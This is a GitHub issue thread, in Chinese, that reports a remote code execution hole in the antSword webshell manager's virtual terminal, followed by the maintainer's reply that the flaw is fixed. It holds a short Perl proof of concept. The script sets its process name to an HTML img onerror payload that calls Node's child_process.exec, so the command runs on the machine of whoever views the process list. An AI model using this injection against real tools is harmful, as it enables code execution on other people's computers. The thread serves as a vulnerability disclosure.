### ISSUE TITLE
又一发远程命令执行漏洞

### ISSUE THREAD

**Issue by loveshell** [antoor/antSword#16]
环境构造：
利用代码如下：
test.pl
```
$0="<img src=1 onerror=\"require('child_process').exec('touch /tmp/kindle')\">";
sleep 100
```
执行perl test.pl

黑客操作：
打开shell的虚拟终端，ps aux。。。

然后看到本机生成如下文件/tmp/kindle

危害：可控制黑客电脑

**Comment by antoor** [comment]
该问题出现在虚拟终端中的解析路径没进行严格过滤。
现已修复，感谢反馈！
